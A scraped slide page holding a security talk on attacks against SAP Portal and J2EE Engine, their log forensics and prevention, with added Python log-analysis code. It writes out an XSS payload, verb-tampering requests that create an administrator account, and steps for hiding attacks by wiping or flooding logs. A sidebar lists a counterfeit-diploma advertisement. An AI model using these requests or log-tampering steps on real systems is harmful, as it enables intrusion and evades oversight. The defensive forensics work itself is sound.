Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
Safe Software
 
OpenMetadata Community Meeting - 5th June 2024
OpenMetadata Community Meeting - 5th June 2024OpenMetadata Community Meeting - 5th June 2024
OpenMetadata Community Meeting - 5th June 2024
OpenMetadata
 
Oracle 23c New Features For DBAs and Developers.pptx
Oracle 23c New Features For DBAs and Developers.pptxOracle 23c New Features For DBAs and Developers.pptx
Oracle 23c New Features For DBAs and Developers.pptx
Remote DBA Services
 
E-commerce Development Services- Hornet Dynamics
E-commerce Development Services- Hornet DynamicsE-commerce Development Services- Hornet Dynamics
E-commerce Development Services- Hornet Dynamics
Hornet Dynamics
 
KuberTENes Birthday Bash Guadalajara - Introducción a Argo CD
KuberTENes Birthday Bash Guadalajara - Introducción a Argo CDKuberTENes Birthday Bash Guadalajara - Introducción a Argo CD
KuberTENes Birthday Bash Guadalajara - Introducción a Argo CD
rodomar2
 
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
mz5nrf0n
 
Using Query Store in Azure PostgreSQL to Understand Query Performance
Using Query Store in Azure PostgreSQL to Understand Query PerformanceUsing Query Store in Azure PostgreSQL to Understand Query Performance
Using Query Store in Azure PostgreSQL to Understand Query Performance
Grant Fritchey
 
UI5con 2024 - Boost Your Development Experience with UI5 Tooling Extensions
UI5con 2024 - Boost Your Development Experience with UI5 Tooling ExtensionsUI5con 2024 - Boost Your Development Experience with UI5 Tooling Extensions
UI5con 2024 - Boost Your Development Experience with UI5 Tooling Extensions
Peter Muessig
 
2024 eCommerceDays Toulouse - Sylius 2.0.pdf
2024 eCommerceDays Toulouse - Sylius 2.0.pdf2024 eCommerceDays Toulouse - Sylius 2.0.pdf
2024 eCommerceDays Toulouse - Sylius 2.0.pdf
Łukasz Chruściel
 
Microservice Teams - How the cloud changes the way we work
Microservice Teams - How the cloud changes the way we workMicroservice Teams - How the cloud changes the way we work
Microservice Teams - How the cloud changes the way we work
Sven Peters
 
Introducing Crescat - Event Management Software for Venues, Festivals and Eve...
Introducing Crescat - Event Management Software for Venues, Festivals and Eve...Introducing Crescat - Event Management Software for Venues, Festivals and Eve...
Introducing Crescat - Event Management Software for Venues, Festivals and Eve...
Crescat
 
A Study of Variable-Role-based Feature Enrichment in Neural Models of Code
A Study of Variable-Role-based Feature Enrichment in Neural Models of CodeA Study of Variable-Role-based Feature Enrichment in Neural Models of Code
A Study of Variable-Role-based Feature Enrichment in Neural Models of Code
Aftab Hussain
 
SMS API Integration in Saudi Arabia| Best SMS API Service
SMS API Integration in Saudi Arabia| Best SMS API ServiceSMS API Integration in Saudi Arabia| Best SMS API Service
SMS API Integration in Saudi Arabia| Best SMS API Service
Yara Milbes
 
Artificia Intellicence and XPath Extension Functions
Artificia Intellicence and XPath Extension FunctionsArtificia Intellicence and XPath Extension Functions
Artificia Intellicence and XPath Extension Functions
Octavian Nadolu
 
Unveiling the Advantages of Agile Software Development.pdf
Unveiling the Advantages of Agile Software Development.pdfUnveiling the Advantages of Agile Software Development.pdf
Unveiling the Advantages of Agile Software Development.pdf
brainerhub1
 

Recently uploaded (20)

Hand Rolled Applicative User Validation Code Kata
Hand Rolled Applicative User ValidationCode KataHand Rolled Applicative User ValidationCode Kata
Hand Rolled Applicative User Validation Code Kata
 
Energy consumption of Database Management - Florina Jonuzi
Energy consumption of Database Management - Florina JonuziEnergy consumption of Database Management - Florina Jonuzi
Energy consumption of Database Management - Florina Jonuzi
 
Neo4j - Product Vision and Knowledge Graphs - GraphSummit Paris
Neo4j - Product Vision and Knowledge Graphs - GraphSummit ParisNeo4j - Product Vision and Knowledge Graphs - GraphSummit Paris
Neo4j - Product Vision and Knowledge Graphs - GraphSummit Paris
 
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdf
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdfAutomated software refactoring with OpenRewrite and Generative AI.pptx.pdf
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdf
 
Empowering Growth with Best Software Development Company in Noida - Deuglo
Empowering Growth with Best Software  Development Company in Noida - DeugloEmpowering Growth with Best Software  Development Company in Noida - Deuglo
Empowering Growth with Best Software Development Company in Noida - Deuglo
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
 
OpenMetadata Community Meeting - 5th June 2024
OpenMetadata Community Meeting - 5th June 2024OpenMetadata Community Meeting - 5th June 2024
OpenMetadata Community Meeting - 5th June 2024
 
Oracle 23c New Features For DBAs and Developers.pptx
Oracle 23c New Features For DBAs and Developers.pptxOracle 23c New Features For DBAs and Developers.pptx
Oracle 23c New Features For DBAs and Developers.pptx
 
E-commerce Development Services- Hornet Dynamics
E-commerce Development Services- Hornet DynamicsE-commerce Development Services- Hornet Dynamics
E-commerce Development Services- Hornet Dynamics
 
KuberTENes Birthday Bash Guadalajara - Introducción a Argo CD
KuberTENes Birthday Bash Guadalajara - Introducción a Argo CDKuberTENes Birthday Bash Guadalajara - Introducción a Argo CD
KuberTENes Birthday Bash Guadalajara - Introducción a Argo CD
 
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
 
Using Query Store in Azure PostgreSQL to Understand Query Performance
Using Query Store in Azure PostgreSQL to Understand Query PerformanceUsing Query Store in Azure PostgreSQL to Understand Query Performance
Using Query Store in Azure PostgreSQL to Understand Query Performance
 
UI5con 2024 - Boost Your Development Experience with UI5 Tooling Extensions
UI5con 2024 - Boost Your Development Experience with UI5 Tooling ExtensionsUI5con 2024 - Boost Your Development Experience with UI5 Tooling Extensions
UI5con 2024 - Boost Your Development Experience with UI5 Tooling Extensions
 
2024 eCommerceDays Toulouse - Sylius 2.0.pdf
2024 eCommerceDays Toulouse - Sylius 2.0.pdf2024 eCommerceDays Toulouse - Sylius 2.0.pdf
2024 eCommerceDays Toulouse - Sylius 2.0.pdf
 
Microservice Teams - How the cloud changes the way we work
Microservice Teams - How the cloud changes the way we workMicroservice Teams - How the cloud changes the way we work
Microservice Teams - How the cloud changes the way we work
 
Introducing Crescat - Event Management Software for Venues, Festivals and Eve...
Introducing Crescat - Event Management Software for Venues, Festivals and Eve...Introducing Crescat - Event Management Software for Venues, Festivals and Eve...
Introducing Crescat - Event Management Software for Venues, Festivals and Eve...
 
A Study of Variable-Role-based Feature Enrichment in Neural Models of Code
A Study of Variable-Role-based Feature Enrichment in Neural Models of CodeA Study of Variable-Role-based Feature Enrichment in Neural Models of Code
A Study of Variable-Role-based Feature Enrichment in Neural Models of Code
 
SMS API Integration in Saudi Arabia| Best SMS API Service
SMS API Integration in Saudi Arabia| Best SMS API ServiceSMS API Integration in Saudi Arabia| Best SMS API Service
SMS API Integration in Saudi Arabia| Best SMS API Service
 
Artificia Intellicence and XPath Extension Functions
Artificia Intellicence and XPath Extension FunctionsArtificia Intellicence and XPath Extension Functions
Artificia Intellicence and XPath Extension Functions
 
Unveiling the Advantages of Agile Software Development.pdf
Unveiling the Advantages of Agile Software Development.pdfUnveiling the Advantages of Agile Software Development.pdf
Unveiling the Advantages of Agile Software Development.pdf
 

Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine

  • 7. Is it popular? Talks about SAP security
  [chart: number of talks about SAP security per year, 2006-2012]
  •  BlackHat
  •  HITB
  •  Troopers
  •  RSA
  •  Source
  •  ITWeb
  •  DeepSec
  Source: SAP Security in Figures 2013
  • 9. Is it relevant for South Africa?
  Simple scan for SAP routers exposed to the Internet:
  •  63 SAP Routers found on the default port
  •  27 SAP Routers with medium-critical issues
  •  7 SAP Routers with high-critical issues
  Number of web-based SAP systems found:
  •  20 by Shodan
  • 10. What about other services?
  [chart: SAP services found exposed to the Internet worldwide: SAP Dispatcher, SAP MMC, SAP Message Server, SAP HostControl, SAP ITS Agate, SAP Message Server httpd]
  http://erpscan.com/wp-content/uploads/2012/06/SAP-Security-in-figures-a-global-survey-2007-2011-final.pdf
  • 11. Who actually tried to break SAP?
  Now, it adds, “We gained full access to the Greek Ministry of Finance. Those funky IBM servers don't look so safe now, do they...” Anonymous claims to have a “sweet 0day SAP exploit”, and the group intends to “sploit the hell out of it.”
  * This attack has not been confirmed by the customer nor by the police authorities in Greece investigating the case. SAP does not have any indication that it happened.
  • 12. What about unpublished threats?
  •  Companies are not interested in publishing information about their breaches
  •  There are a lot of internal breaches thanks to unnecessarily granted authorizations (an employee buys hundreds of excavators instead of ten by mistake)
  •  There are known stories about backdoors left by developers in custom ABAP code
  •  How can you be sure that, if a breach occurs, you can find evidence?
  • 13. SAP Forensics
  •  If there are no known attacks, it doesn't mean anything
  •  Companies don't like to share it
  •  Only ~10% of companies use the security audit log
  •  Even where it is used, almost nobody manages it (~5%)
  •  Even where it is managed, there is no correlation (~1%)
  http://erpscan.com/wp-content/uploads/2012/06/SAP-Security-in-figures-a-global-survey-2007-2011-final.pdf
  • 14. Typical SAP audit options
  •  ICM log (icm/HTTP/logging_0): 70%
  •  Security audit log in ABAP: 10%
  •  Table access logging (rec/client): 4%
  •  Message Server log (ms/audit): 2%
  •  SAP Gateway access log: 2%
  * % of companies (based on our security assessments and product implementations)
  • 15. What do we see?
  •  A lot of research
  •  Real attacks
  •  Lack of logging practice
  •  Many vulnerabilities are hard to close → we need to monitor them, at least
  http://erpscan.com/wp-content/uploads/2012/06/SAP-Security-in-figures-a-global-survey-2007-2011-final.pdf
  • 16. What do we need to monitor? External attacks on SAP
  •  Ideally, we should control everything, but this talk has limits, so let's focus on the most critical areas
  •  Attacks on users and SAP GUI: awareness
  •  SAP Router: secure configuration and patch management
  •  Exposed SAP services: disable them
  •  SAP Portal: too many issues and too much custom configuration; there may be 0-days; we need to concentrate on this area
  • 17. SAP Portal
  •  Point of web access to SAP systems
  •  Point of web access to other corporate systems
  •  Way for attackers to get access to SAP from the Internet
  • 19. Let's begin the technical part
  Full logging is not always the best option
  * not only because of system high load
  • 20. Full logging is not always the best option
  •  SAP MMC: centralized system management
  •  Allows seeing the trace and log messages
  •  If TRACE_LEVEL = 3 → JSESSIONIDs are stored in logs
  •  \<SID>\DVEBMGS<id>\j2ee\cluster\server0\log\system\userinterface.log
  •  It's not bad if you only use it sometimes and delete the logs after use, but...
  • 21. But sometimes
  •  SAP MMC has remote commands
  •  By default, many commands go without auth
  •  Commands are simple SOAP requests
  •  An attacker can read logs without auth
  •  And read the JSESSIONIDs stored in the logs
  •  And use them to log into SAP Portal
  • 22. Prevention
  •  Don't use TRACE_LEVEL = 3
  •  Delete traces when work is finished
  •  Limit access to dangerous methods
  •  Install notes 927637 and 1439348
  •  Mask security-sensitive data in the HTTP access log
  http://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm
  • 23. Masking security-sensitive data in the HTTP log
  •  The HTTP Provider service can mask security-sensitive URL parameters, cookies, or headers
  •  By default, only for the items listed below:
     -  Path parameter: jsessionid
     -  Request parameters: j_password, j_username, j_sap_password, j_sap_again, oldPassword, confirmNewPassword, ticket
     -  HTTP headers: Authorization, Cookie (JSESSIONID, MYSAPSSO2)
  http://help.sap.com/saphelp_nwce71/helpdata/en/79/77b142c444c96ae10000000a155106/content.htm
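The masking described on slides 22 and 23, and the check that follows from slides 20 and 21 (are session identifiers still reaching a log in clear text?), as an added example that is not ERPScan's or SAP's code. It applies the default list from slide 23 to a constructed log excerpt; the regular expressions approximating the path-parameter, query-string, cookie and Authorization syntax, and every sample value, are our own assumptions.

```python
"""Mask the security-sensitive values the HTTP Provider service masks by default
(slide 23) and report values that still reach a log excerpt unmasked.
Added example, not ERPScan's or SAP's code; the log excerpt is constructed and
the URL/cookie/header grammar below is a simplified approximation."""
import re

# Names taken from slide 23.
PATH_PARAMS = ("jsessionid",)
REQUEST_PARAMS = ("j_password", "j_username", "j_sap_password", "j_sap_again",
                  "oldPassword", "confirmNewPassword", "ticket")
COOKIES = ("JSESSIONID", "MYSAPSSO2")
MASK = "***"


def _alt(names):
    return "|".join(re.escape(n) for n in names)


# (regex, kind): group 1 keeps the name, whatever follows it is the value to mask.
RULES = [
    (re.compile(r"(;(?:%s)=)[^?\s#]+" % _alt(PATH_PARAMS), re.I), "path parameter"),
    (re.compile(r"([?&](?:%s)=)[^&\s#]+" % _alt(REQUEST_PARAMS)), "request parameter"),
    (re.compile(r"\b((?:%s)=)[^;\s#]+" % _alt(COOKIES)), "cookie"),
    (re.compile(r"(Authorization:\s*(?:\w+\s+)?)[^\s#]+", re.I), "header"),
]


def mask_line(line):
    """Return the line with every sensitive value replaced by MASK."""
    for rx, _ in RULES:
        line = rx.sub(lambda m: m.group(1) + MASK, line)
    return line


def mask_text(text):
    return "\n".join(mask_line(l) for l in text.splitlines())


def find_unmasked(text):
    """List (line number, kind, value) for sensitive values still in clear text."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        for rx, kind in RULES:
            for m in rx.finditer(line):
                value = m.group(0)[len(m.group(1)):]
                if value != MASK:
                    hits.append((no, kind, value))
    return hits


# Constructed excerpt in the style of responses.trc / userinterface.log; the
# session identifiers and credentials are made up. The last line is already masked.
SAMPLE_LOG = "\n".join([
    "#Plain###192.168.192.26 : GET /irj/portal;jsessionid=AbC123xyz!1234"
    "?j_username=admin&j_password=Secr3t HTTP/1.1 200 3968#",
    "#Plain###192.168.192.26 : Cookie: JSESSIONID=(J2EE1234)ID0987654321DB1234;"
    " MYSAPSSO2=AjExMDAgAAhwb3J0YWw6; saplb_*=(J2EE1234)1234#",
    "#Plain###192.168.192.26 : Authorization: Basic YWRtaW46U2VjcjN0#",
    "#Plain###192.168.192.26 : GET /irj/portal;jsessionid=*** HTTP/1.1 200 100#",
])

if __name__ == "__main__":
    for hit in find_unmasked(SAMPLE_LOG):
        print("line %d: unmasked %s: %s" % hit)
    print(mask_text(SAMPLE_LOG))
```

Run `find_unmasked` over a trace directory before handing logs to anyone, and after changing the masking configuration, to confirm that the JSESSIONID and MYSAPSSO2 values an attacker would replay (slide 21) no longer appear in clear text.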
  • 24. SAP Attacks and Forensics
  * Only J2EE engine
  • 25. SAP Logging
  “If you are running an ABAP + Java installation of Web AS with SAP Web Dispatcher as a load balancing solution, you can safely disable logging of HTTP requests and responses on J2EE Engine, and use the corresponding CLF logs of SAP Web Dispatcher. This also improves the HTTP communication performance. The only drawback of using the Web Dispatcher's CLF logs is that no information is available about the user executing the request (since the user is not authenticated on the Web Dispatcher, but on the J2EE Engine instead).”
  * Not the only drawback... There are many complex attacks with POST requests.
  http://help.sap.com/saphelp_nw70ehp1/helpdata/en/ef/8cd7f51dfead42ab90537886104269/frameset.htm
  • 26. SAP J2EE Logging
  •  Categories of system events recorded:
     -  System: all system-related security and administrative logs
     -  Applications: all system events related to business logic
     -  Performance: reserved for single activity tracing
  •  Default location of these files in your file system: \usr\sap\<SID>\<id>\j2ee\cluster\<node>\log
  •  The developer trace files of the Java instance:
     -  \<SID>\<instance name>\work
  •  The developer trace files of the central services:
     -  \<SID>\<instance name>\work
     -  \<SID>\<instance name>\log
  •  Java server logs:
     -  \<SID>\<instance name>\j2ee\cluster\server<n>\log
  http://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm
  • 27. Simple attacks
  •  Information disclosure and XSS
  •  Verb Tampering via HEAD
  •  Invoker servlet via GET
  All of these leave their trace in the request line and headers recorded in the HTTP access log: j2ee\cluster\<node>\log\system\httpaccess\responses.trc
  • 28. XSS: Forensics
  #Plain###192.168.192.26 : GET /irj/servlet/prt/portal/prtroot/com.sap.portal.usermanagement.admin.UserMapping?systemid=MS_EXCHANGEaaaa%3C/script%3E%3Cscript%3Ealert(%27xSS%27)%3C/script%3E HTTP/1.1 200 3968#
  The payload is URL-encoded in the query string of a GET, so it is visible in the access log; decode the URL before matching for script tags.
  http://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm
  • 29. Verb Tampering: Description (web.xml)
  <servlet>
    <servlet-name>CriticalAction</servlet-name>
    <servlet-class>com.sap.admin.Critical.Action</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>CriticalAction</servlet-name>
    <url-pattern>/admin/critical</url-pattern>
  </servlet-mapping>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>Restrictedaccess</web-resource-name>
      <url-pattern>/admin/*</url-pattern>
      <!-- only GET is constrained: a HEAD request to /admin/critical is not covered
           by the constraint and reaches the servlet without the administrator role -->
      <http-method>GET</http-method>
    </web-resource-collection>
    <auth-constraint>
      <role-name>administrator</role-name>
    </auth-constraint>
  </security-constraint>
  • 30. Verb Tampering: Attack
  •  Create a new user ITWEB:ITWEB
     HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=ITWEB,PASSWORD=ITWEB
  •  Add the user ITWEB to the group Administrators
     HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;ADD_USER_TO_GROUP;USERNAME=ITWEB,GROUPNAME=Administrators
  Works when the UME uses the Java database as its data source
  • 31. Verb Tampering: Prevention
  •  Install SAP Notes 1503579, 1616259
  •  Install the other SAP Notes about Verb Tampering
  •  Scan applications with the ERPScan WEB.XML checker
  •  Disable the applications that are not necessary
  • 32. Verb Tampering: Forensics
  [Apr 3, 2013 1:23:59 AM ] - 192.168.192.14 : GET /ctc/ConfigServlet HTTP/1.1 401 1790
  [Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=ITWEB,PASSWORD=ITWEB HTTP/1.0 200 0
  The telltale pair: the same client is answered 401 for a GET to /ctc/ConfigServlet, then 200 with an empty body for a HEAD carrying the CREATEUSER command.
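Detection logic for the three simple attacks of slides 27, 28 and 32 run over access-log lines, as an added example that is not ERPScan's code. The first three sample lines are the ones shown on slides 28 and 32; the remaining lines are constructed, including the `/ctc/servlet/com.sap.ctc.util.ConfigServlet` invoker-style path. The list of admin servlets and the heuristic that an invoker-servlet URL has a dotted class name right after `/servlet/` are assumptions to adapt to your own landscape.

```python
"""Flag XSS payloads, verb tampering and invoker-servlet calls in a J2EE HTTP
access log (responses.trc / responses.log). Added example, not ERPScan's code.
Sample lines 1-3 are from the slides; the others are constructed."""
import re
from urllib.parse import unquote, urlsplit

# Matches both layouts seen on the slides:
#   #Plain###<ip> : <METHOD> <url> HTTP/x.y <status> <bytes>#
#   [<timestamp>] - <ip> : <METHOD> <url> HTTP/x.y <status> <bytes>
LINE_RE = re.compile(r"""
    (?:\[(?P<ts>[^\]]*)\]\s*-\s*|\#Plain\#\#\#)
    (?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s*:\s*
    (?P<method>[A-Z]+)\s+(?P<url>\S+)\s+HTTP/[\d.]+\s+
    (?P<status>\d{3})\s+(?P<size>\d+)""", re.X)

ADMIN_SERVLETS = {"/ctc/ConfigServlet"}          # assumption: extend for your landscape
XSS_MARKERS = ("<script", "javascript:", "onerror=", "onload=")
# Assumed shape of an invoker-servlet URL: /<app>/servlet/<fully.qualified.ClassName>.
# Requiring a dotted segment keeps the portal's own /irj/servlet/prt/ path out.
INVOKER_RE = re.compile(r"/servlet/[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)+(?=[/?;]|$)")
USER_MGMT_RE = re.compile(r"UserConfig;(CREATEUSER|ADD_USER_TO_GROUP)", re.I)


def analyse(text):
    """Parse every access-log line and attach a list of flags to each request."""
    denied = set()          # (ip, path) pairs that already answered 401/403 to this client
    out = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        ip, method, status = m["ip"], m["method"], int(m["status"])
        parts = urlsplit(m["url"])
        path, query = parts.path, unquote(parts.query)
        flags = []
        if any(x in unquote(m["url"]).lower() for x in XSS_MARKERS):
            flags.append("xss")                       # reflected payload visible in the URL
        if method == "HEAD" and status == 200 and path in ADMIN_SERVLETS:
            flags.append("verb_tampering")            # HEAD reached a servlet that needs auth
        if status == 200 and method != "GET" and (ip, path) in denied:
            flags.append("bypass_after_401")          # same client, same path: denied, then allowed
        if INVOKER_RE.search(path):
            flags.append("invoker_servlet")           # class addressed directly, web.xml mapping skipped
        if USER_MGMT_RE.search(query):
            flags.append("configservlet_user_mgmt")   # user creation / group change via ConfigServlet
        if status in (401, 403):
            denied.add((ip, path))
        out.append({"ip": ip, "method": method, "path": path, "status": status, "flags": flags})
    return out


def suspicious(text):
    return [r for r in analyse(text) if r["flags"]]


SAMPLE_LOG = "\n".join([
    # slide 28
    "#Plain###192.168.192.26 : GET /irj/servlet/prt/portal/prtroot/"
    "com.sap.portal.usermanagement.admin.UserMapping?systemid=MS_EXCHANGEaaaa"
    "%3C/script%3E%3Cscript%3Ealert(%27xSS%27)%3C/script%3E HTTP/1.1 200 3968#",
    # slide 32
    "[Apr 3, 2013 1:23:59 AM ] - 192.168.192.14 : GET /ctc/ConfigServlet HTTP/1.1 401 1790",
    "[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet?param="
    "com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=ITWEB,PASSWORD=ITWEB HTTP/1.0 200 0",
    # constructed: the same command addressed through the invoker servlet with a plain GET
    "[Apr 3, 2013 1:31:12 AM ] - 192.168.192.14 : GET /ctc/servlet/com.sap.ctc.util.ConfigServlet"
    "?param=com.sap.ctc.util.UserConfig;ADD_USER_TO_GROUP;USERNAME=ITWEB,GROUPNAME=Administrators"
    " HTTP/1.1 200 0",
    # constructed: ordinary portal traffic
    "[Apr 3, 2013 1:32:40 AM ] - 10.0.0.7 : GET /irj/portal HTTP/1.1 200 12034",
])

if __name__ == "__main__":
    for r in suspicious(SAMPLE_LOG):
        print(r["ip"], r["method"], r["status"], r["path"], ",".join(r["flags"]))
```

The `bypass_after_401` flag is the one worth alerting on: it needs no knowledge of which servlets are sensitive, only the observation that a client was refused on a path and then succeeded on the same path with a different method.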
  • 34. Invoker Servlet: Forensics (user creation)
  Security audit log records:
  #1.5#000C29C2603300790000003A000008700004D974E7CCC6D8#1364996035203#/System/Security/Audit#sap.com/tc~lm~ctc~util~basic_ear#com.sap.security.core.util.SecurityAudit#Guest#0#SAP J2EE Engine JTA Transaction : [024423a006e18]#n/a##217c5d309c6311e29bca000c29c26033#SAPEngine_Application_Thread[impl:3]_22##0#0#Info#1#com.sap.security.core.util.SecurityAudit#Plain###Guest | USER.CREATE | USER.PRIVATE_DATASOURCE.un:hacker | | SET_ATTRIBUTE: uniquename=[hacker]#
  #1.5#000C29C2603300790000003B000008700004D974E7CD3828#1364996035234#/System/Security/Audit#sap.com/tc~lm~ctc~util~basic_ear#com.sap.security.core.util.SecurityAudit#Guest#0#SAP J2EE Engine JTA Transaction : [024423a006e26]#n/a##217c5d309c6311e29bca000c29c26033#SAPEngine_Application_Thread[impl:3]_22##0#0#Warning#1#com.sap.security.core.util.SecurityAudit#Plain###Guest | USERACCOUNT.CREATE | UACC.PRIVATE_DATASOURCE.un:hacker | | SET_ATTRIBUTE: userid=[USER.PRIVATE_DATASOURCE.un:hacker]#
  #1.5#000C29C2603300680002C97A000008700004D974E8354D1D#1364996042062#/System/Security/Audit/J2EE#sap.com/irj#com.sap.engine.services.security.roles.audit#Guest#182818##n/a##0c5bfef08bc511e287e6000c29c26033#Thread[Thread-50,5,SAPEngine_Application_Thread[impl:3]_Group]##0#0#Info#1#com.sap.engine.services.security.roles.audit#Java###{0}: Authorization check for caller assignment to J2EE security role [{1} : {2}].#3#ACCESS.OK#SAP-J2EE-Engine#guests#
  The user “hacker” is created by the Guest user, i.e. by a caller that never authenticated.
  http://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm
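A parser for the audit records on slide 34 with the rule a practitioner would actually alert on (user or account creation whose actor is the anonymous Guest user), as an added example that is not ERPScan's or SAP's code. The positional layout of the `#`-separated fields (timestamp, location, application, logger, user, severity, format, message) is inferred from the three records on the slide and is an assumption, not SAP's documented format; likewise the reading that a `Java`-format record carries a message template followed by an argument count and the arguments. The sample text is the slide's three records.

```python
"""Parse J2EE security audit log records (slide 34) and flag *.CREATE actions
performed by an anonymous user. Added example, not ERPScan's or SAP's code.
Field positions are inferred from the slide's records (assumption)."""
import re
from datetime import datetime, timezone

RECORD_START = re.compile(r"(?=#1\.5#)")   # zero-width split needs Python 3.7+
ANONYMOUS_USERS = {"Guest"}
ACCOUNT_RE = re.compile(r"\.un:([^\s|\]]+)")   # '...PRIVATE_DATASOURCE.un:<name>'


def parse_records(text):
    """Return one dict per record; 'Java'-format messages get their arguments filled in."""
    records = []
    for chunk in RECORD_START.split(text):
        chunk = chunk.strip()
        if not chunk.startswith("#1.5#"):
            continue
        f = chunk.split("#")
        if len(f) < 25:
            continue
        fmt, message = f[20], f[23]
        if fmt == "Java":                       # template, argument count, arguments
            n = int(f[24])
            message = message.format(*f[25:25 + n])
        records.append({
            "time": datetime.fromtimestamp(int(f[3]) / 1000, tz=timezone.utc)
                            .isoformat(timespec="seconds"),
            "location": f[4], "application": f[5], "logger": f[6],
            "user": f[7], "severity": f[17], "message": message,
        })
    return records


def anonymous_user_changes(text):
    """SecurityAudit messages read 'actor | ACTION | target | | attributes'.
    Flag every *.CREATE whose actor is an anonymous user: nobody logged in, yet
    a user or account came into existence."""
    hits = []
    for r in parse_records(text):
        parts = [p.strip() for p in r["message"].split("|")]
        if len(parts) < 3:
            continue
        actor, action, target = parts[0], parts[1], parts[2]
        if actor in ANONYMOUS_USERS and action.endswith(".CREATE"):
            m = ACCOUNT_RE.search(target)
            hits.append({"time": r["time"], "actor": actor, "action": action,
                         "account": m.group(1) if m else None,
                         "severity": r["severity"]})
    return hits


# The three records shown on slide 34, one per line.
SAMPLE_AUDIT = "\n".join([
    "#1.5#000C29C2603300790000003A000008700004D974E7CCC6D8#1364996035203#/System/Security/Audit"
    "#sap.com/tc~lm~ctc~util~basic_ear#com.sap.security.core.util.SecurityAudit#Guest#0"
    "#SAP J2EE Engine JTA Transaction : [024423a006e18]#n/a##217c5d309c6311e29bca000c29c26033"
    "#SAPEngine_Application_Thread[impl:3]_22##0#0#Info#1#com.sap.security.core.util.SecurityAudit"
    "#Plain###Guest | USER.CREATE | USER.PRIVATE_DATASOURCE.un:hacker | | "
    "SET_ATTRIBUTE: uniquename=[hacker]#",
    "#1.5#000C29C2603300790000003B000008700004D974E7CD3828#1364996035234#/System/Security/Audit"
    "#sap.com/tc~lm~ctc~util~basic_ear#com.sap.security.core.util.SecurityAudit#Guest#0"
    "#SAP J2EE Engine JTA Transaction : [024423a006e26]#n/a##217c5d309c6311e29bca000c29c26033"
    "#SAPEngine_Application_Thread[impl:3]_22##0#0#Warning#1#com.sap.security.core.util.SecurityAudit"
    "#Plain###Guest | USERACCOUNT.CREATE | UACC.PRIVATE_DATASOURCE.un:hacker | | "
    "SET_ATTRIBUTE: userid=[USER.PRIVATE_DATASOURCE.un:hacker]#",
    "#1.5#000C29C2603300680002C97A000008700004D974E8354D1D#1364996042062#/System/Security/Audit/J2EE"
    "#sap.com/irj#com.sap.engine.services.security.roles.audit#Guest#182818##n/a##"
    "0c5bfef08bc511e287e6000c29c26033#Thread[Thread-50,5,SAPEngine_Application_Thread[impl:3]_Group]"
    "##0#0#Info#1#com.sap.engine.services.security.roles.audit#Java###{0}: Authorization check for "
    "caller assignment to J2EE security role [{1} : {2}].#3#ACCESS.OK#SAP-J2EE-Engine#guests#",
])

if __name__ == "__main__":
    for h in anonymous_user_changes(SAMPLE_AUDIT):
        print(h["time"], h["actor"], h["action"], h["account"], h["severity"])
```

The timestamps are epoch milliseconds and are rendered in UTC here; the access log on slide 32 prints local server time, so align time zones before correlating the two sources.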
36. Invoker Servlet: Prevention
• Update to the latest patch level; see SAP Notes 1467771 and 1445998
• "EnableInvokerServletGlobally" must be set to "false"
• Check all WEB.XML files with the ERPScan WEB.XML checker
37. Anti-forensics for simple attacks
• Overwrite the log file with trash requests
• Disable the logs (needs a server restart)
• Delete the logs (not so easy)
* There should be a separate place for the logs, to prevent modifications and to detect these kinds of attacks
38. Advanced attacks
• CSRF in Web Dynpro Java
• XXE in Portal
• Malicious upload in Portal
* All of them need additional analysis, such as enabling POST data logging or looking for indirect signs
39. Advanced attacks: Web Dynpro Java
• Unauthorized modifications through Web Dynpro
• For example:
  - somebody steals an account using XSS/CSRF/sniffing
  - then tries to modify the severity level of the logs
41. Advanced attacks: Web Dynpro Java
• No traces of the change in the default log file, cluster/server0/log/system/httpaccess/responses.log
• Web Dynpro sends all data by POST, so responses.log only shows the request URLs, never the submitted data
• But sometimes the action can be found through indirect signs:

[Mar 20, 2013 9:35:49 AM ] - 172.16.0.63 : GET /webdynpro/resources/sap.com/tc~lm~webadmin~log_config~wd/Components/com.sap.tc.log_configurator.LogConfigurator/warning.gif HTTP/1.1 200 110

• The client loaded images from the server while making the change (here an icon belonging to the Log Configurator application)
42. Web Dynpro Java: Forensics
• Most actions have icons
• They have to be loaded from the server
• Legitimate users usually already have them all in the browser cache
• Attackers usually don't, so their browsers request them from the server
• That's how potentially malicious actions can be identified
